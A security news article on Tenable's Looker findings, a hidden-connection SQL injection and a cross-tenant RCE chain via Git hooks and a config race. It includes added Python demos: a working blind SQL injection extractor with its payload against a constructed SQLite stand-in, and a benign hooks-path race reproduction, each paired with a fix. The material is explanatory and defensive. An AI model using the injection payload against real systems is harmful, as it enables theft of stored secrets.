Google Looker Bugs Enable Cross-Tenant RCE, Knowledge Exfil

By NextTech, February 9, 2026
Researchers have identified two serious security flaws in a popular Google data service, either of which could give attackers access to sensitive secrets useful for widespread lateral movement.

Looker, not to be confused with the more pared-down Looker Studio, is a heavyweight business intelligence and data analytics platform. It is essentially a dashboard for modeling data, building visualizations, and more. According to the data aggregator TheirStack, it is used by more than 60,000 companies, including brand names like Wayfair, Coinbase, and Walmart.

"In a typical enterprise, Looker is not just a dashboard: it's the central nervous system for data," says Liv Matan, senior research engineer at Tenable. That makes it an ideal target for cyberattacks, he says, not least because "a typical organization might have Looker connected to 20 to 50-plus data sources, ranging from massive warehouses like BigQuery to sensitive operational databases like PostgreSQL and MySQL."


On Feb. 4, Matan described a remote code execution (RCE) chain in Looker that could let an attacker reach the infrastructure it runs on and even, in cloud deployments, gain access to other tenants. He also described a separate SQL injection vulnerability useful for reaching all the data the platform manages.

Exfiltration of Database Secrets

The first, less severe of the two findings concerns Looker's internal database, which stores user lists, secrets, and configurations. It is supposed to be hidden from users. The researchers found the name of the internal database's connection in logs, though, and took advantage of it. They created a new project, intercepted the HTTP request in transit, and changed the parameter that pointed at their own permitted database so that it pointed at the sensitive hidden one instead.

Now they had a connection to it, but not yet a way to read what was inside. For that they used error-based SQL injection: they ran queries they knew would trigger error messages, and the error messages carried the very secret data they were after. Repeated enough times, in theory, this would have let them slowly dump the entire contents of the internal database.

A malicious actor could use this vulnerability to steal secrets and configurations and mount follow-on attacks within Looker. It is now tracked as CVE-2025-12743, and it earned a mid-range Common Vulnerability Scoring System (CVSS) score of 6.0 out of 10.
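The first finding has three moving parts: a connection chosen by the client rather than the server, a query built by string concatenation, and database errors echoed back to the caller. The Python below is an added illustration written for this page, not Looker's code or Tenable's exploit; the schema, connection names, user names and the secret are constructed. SQLite does not echo values inside its error messages, so instead of the data-in-error variant the researchers used, the extractor turns an error into a yes/no oracle (an `abs()` integer overflow) and recovers the secret one character at a time; the hardened endpoint authorizes the connection server-side and binds the filter as a parameter.

```python
"""Constructed stand-in for a query API with a 'hidden' internal connection.
Not Looker's code: names, schema and the secret are invented for the demo."""
import logging
import sqlite3
import uuid

log = logging.getLogger("query-api")


def _make_connections():
    # 'internal' models the hidden metadata DB; 'analytics' is the tenant's own DB.
    internal = sqlite3.connect(":memory:")
    internal.execute("CREATE TABLE db_connections (name TEXT, password TEXT)")
    internal.execute("INSERT INTO db_connections VALUES ('warehouse', 'Wh-pa55word!')")
    analytics = sqlite3.connect(":memory:")
    analytics.execute("CREATE TABLE orders (id INTEGER, total REAL)")
    analytics.execute("INSERT INTO orders VALUES (1, 9.99)")
    return {"internal": internal, "analytics": analytics}


CONNECTIONS = _make_connections()
# Server-side record of which connections each user may query (constructed).
PERMITTED = {"alice": {"analytics"}, "bob": {"analytics", "internal"}}


def list_tables_vulnerable(user, connection, name_filter):
    con = CONNECTIONS[connection]                      # flaw 1: client picks the connection
    sql = ("SELECT name FROM sqlite_master WHERE type='table' "
           f"AND name='{name_filter}'")                # flaw 2: string concatenation
    try:
        return {"rows": [r[0] for r in con.execute(sql)]}
    except sqlite3.Error as exc:
        return {"error": str(exc)}                     # flaw 3: raw engine error to client


def list_tables_hardened(user, connection, name_filter):
    if connection not in PERMITTED.get(user, set()):   # authorize the connection server-side
        return {"error": "forbidden"}
    con = CONNECTIONS[connection]
    try:
        rows = con.execute("SELECT name FROM sqlite_master WHERE type='table' AND name=?",
                           (name_filter,))             # bound parameter: payload is just a string
        return {"rows": [r[0] for r in rows]}
    except sqlite3.Error as exc:
        ref = uuid.uuid4().hex[:8]
        log.error("query %s failed: %s", ref, exc)     # detail stays in server logs
        return {"error": f"query failed (ref {ref})"}  # opaque error to the client


def _oracle(endpoint, user, pos, threshold):
    """True iff the code point of secret[pos] is > threshold.
    abs(min_int64) raises 'integer overflow' in SQLite; CASE only evaluates it
    when the comparison holds, so error/no-error leaks one bit per request."""
    payload = ("x' OR CASE WHEN unicode(substr((SELECT password FROM db_connections), "
               f"{pos}, 1)) > {threshold} THEN abs(-9223372036854775807-1) ELSE 0 END --")
    resp = endpoint(user, "internal", payload)         # connection swapped to the hidden one
    return "integer overflow" in resp.get("error", "")


def extract_secret(endpoint, user, max_len=64):
    """Binary-search each character of the secret through the error oracle."""
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if _oracle(endpoint, user, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # past the end: unicode('') is NULL, so the oracle never fires
            break
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    print("vulnerable endpoint leaks:", extract_secret(list_tables_vulnerable, "alice"))
    print("hardened endpoint leaks:  ", repr(extract_secret(list_tables_hardened, "bob")))
```

Against the vulnerable endpoint the loop recovers the constructed password with roughly seven requests per character even though the caller was never granted the `internal` connection. Against the hardened endpoint the same user gets `forbidden`, and a user who legitimately holds the connection gets an empty result set, because the payload is bound as a parameter and never parsed as SQL.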

Cross-Tenant RCE in Google Looker

More significantly, Matan and his colleagues built an exploit chain that let them run arbitrary code on a Looker server.


They began with a path traversal. Every Looker project is a Git repository at heart, and by crafting their own remote dependency they were able to control where Git looks for "hooks," powerful scripts that run automatically when certain events occur. The researchers pointed the hooks path at a directory they controlled, tricking Looker into fetching their custom hooks, which, when run, would give them a remote shell.

This didn't work at first. It turned out that by default Looker uses JGit, a Java implementation of Git, which does not support Git hooks. They looked harder, though, and found a way to make Looker use native Git instead of JGit by supplying specific POST parameters when creating their repository.

That wasn't the only obstacle. Before running any Git commands, Looker overwrites the repository's Git config file, resetting the hooks path the researchers had manipulated back to a safe value. To beat this they exploited a race condition, flooding the system with requests so that their malicious overwrite landed in the window between Looker resetting the config file and Git actually running the hooks. This worked after several tries.
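The race described above exists because the defender writes a safe `core.hooksPath` to `.git/config` and then trusts that file when it invokes Git a moment later. The Python script below is an added demonstration for this page, not Looker's code or Tenable's exploit: it builds a throwaway repository with an attacker-controlled hooks directory (constructed), reproduces the reset-then-run pattern with the attacker's write landing in between, and then shows the fix a practitioner would reach for, passing the hooks path with `git -c core.hooksPath=...` on every invocation, which takes precedence over anything in the config file. It needs the `git` binary on PATH; the functions return whether the planted hook executed.

```python
"""Reset-then-run on core.hooksPath is a TOCTOU race; a per-invocation override is not.
Added demo, not Looker's code. The repo, hook and directories are constructed here."""
import os
import shutil
import subprocess
import tempfile

HOOK_MARKER = "hook-ran.marker"   # the planted hook proves it executed by creating this file


def git_available() -> bool:
    return shutil.which("git") is not None


def _git(repo, *args, hooks_override=None):
    """Run git in `repo` with identity set and global/system config ignored (reproducible)."""
    cmd = ["git", "-C", repo, "-c", "user.name=demo", "-c", "user.email=demo@example.invalid"]
    if hooks_override is not None:
        # -c on the command line has the highest precedence: .git/config cannot undo it.
        cmd += ["-c", f"core.hooksPath={hooks_override}"]
    env = dict(os.environ, GIT_CONFIG_NOSYSTEM="1", GIT_CONFIG_GLOBAL=os.devnull)
    return subprocess.run(cmd + list(args), check=True, capture_output=True, text=True, env=env)


def build_victim_repo():
    """Constructed scenario: a project repo, an attacker-controlled hooks dir, and an
    empty 'safe' hooks dir that the defender wants Git to use."""
    work = tempfile.mkdtemp(prefix="hooks-demo-")
    repo, evil, safe = (os.path.join(work, d) for d in ("project", "evil-hooks", "no-hooks"))
    for d in (repo, evil, safe):
        os.makedirs(d)
    subprocess.run(["git", "init", "-q", repo], check=True, capture_output=True)
    hook = os.path.join(evil, "pre-commit")           # attacker's hook (benign stand-in)
    with open(hook, "w") as f:
        f.write(f"#!/bin/sh\ntouch '{os.path.join(work, HOOK_MARKER)}'\n")
    os.chmod(hook, 0o755)
    with open(os.path.join(repo, "README"), "w") as f:
        f.write("demo\n")
    _git(repo, "add", "README")
    return {"work": work, "repo": repo, "evil": evil, "safe": safe}


def hook_ran(ctx) -> bool:
    return os.path.exists(os.path.join(ctx["work"], HOOK_MARKER))


def reset_then_commit(ctx) -> bool:
    """The racy pattern: write a safe path to .git/config, then run Git and trust
    the file. The attacker's write lands between the two steps."""
    _git(ctx["repo"], "config", "core.hooksPath", ctx["safe"])   # defender's reset
    _git(ctx["repo"], "config", "core.hooksPath", ctx["evil"])   # attacker wins the race
    _git(ctx["repo"], "commit", "-q", "-m", "demo")               # Git reads the file: evil hook runs
    return hook_ran(ctx)


def pinned_commit(ctx) -> bool:
    """The fix: supply the hooks path on the invocation itself, so the config file
    the attacker can write is no longer the source of truth."""
    _git(ctx["repo"], "config", "core.hooksPath", ctx["evil"])   # config already poisoned
    _git(ctx["repo"], "commit", "-q", "-m", "demo", hooks_override=ctx["safe"])
    return hook_ran(ctx)


if __name__ == "__main__":
    if git_available():
        print("reset-then-run, hook executed:", reset_then_commit(build_victim_repo()))
        print("pinned -c override, hook executed:", pinned_commit(build_victim_repo()))
```

The same idea applies to any setting Git reads from the repository (`core.fsmonitor`, `core.sshCommand`, `core.pager`): if untrusted content can write the config, neutralize the setting at invocation time rather than by rewriting the file first. Running the Git step with hooks in a directory the attacker cannot write to, and as a low-privilege user, limits what a hook that does slip through can reach.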


As a result, the researchers were able to run whatever code they wanted on the Looker server. They could have accessed highly sensitive data or moved laterally within the compromised target's environment, for starters. Worst of all, they found that on Google Cloud Platform (GCP), because multiple customers might run Looker on the same infrastructure, with shared folders housing service account credentials, an attacker with RCE on the server could also reach other organizations' cloud environments and data.

The Difficulty of Patching Looker

Google fixed both issues in Looker shortly after Tenable first reported them. Organizations that deploy it on-premises will need to update manually to one of the versions listed as fixed in Google's security bulletin GCP-2025-052.

Doing so is not trivial. "It requires significant time and technical effort. Because Looker acts as a central nervous system for an organization's most sensitive data, some organizations may delay updating because they fear unintended system downtime or technical glitches that could disrupt their business," Matan says.

There are other reasons to delay. "Organizations often face logistical roadblocks like rigid change management windows that forbid system updates during peak business hours. They may also need extended time for compatibility testing to ensure the patch doesn't break custom connections to other databases or third-party tools," adds Matan. "Additionally, a lack of a clear asset inventory can lead to shadow IT, where hidden or forgotten instances of the software remain unpatched simply because the central IT team isn't aware they exist."

Patching isn't the be-all and end-all, either. Organizations would be well advised to always follow the principle of least privilege and isolate their Looker instances as they would any other high-risk asset. "Put it in a dedicated network segment so that even if it is compromised, an attacker can't easily reach your core domain controllers or other servers," Matan says.


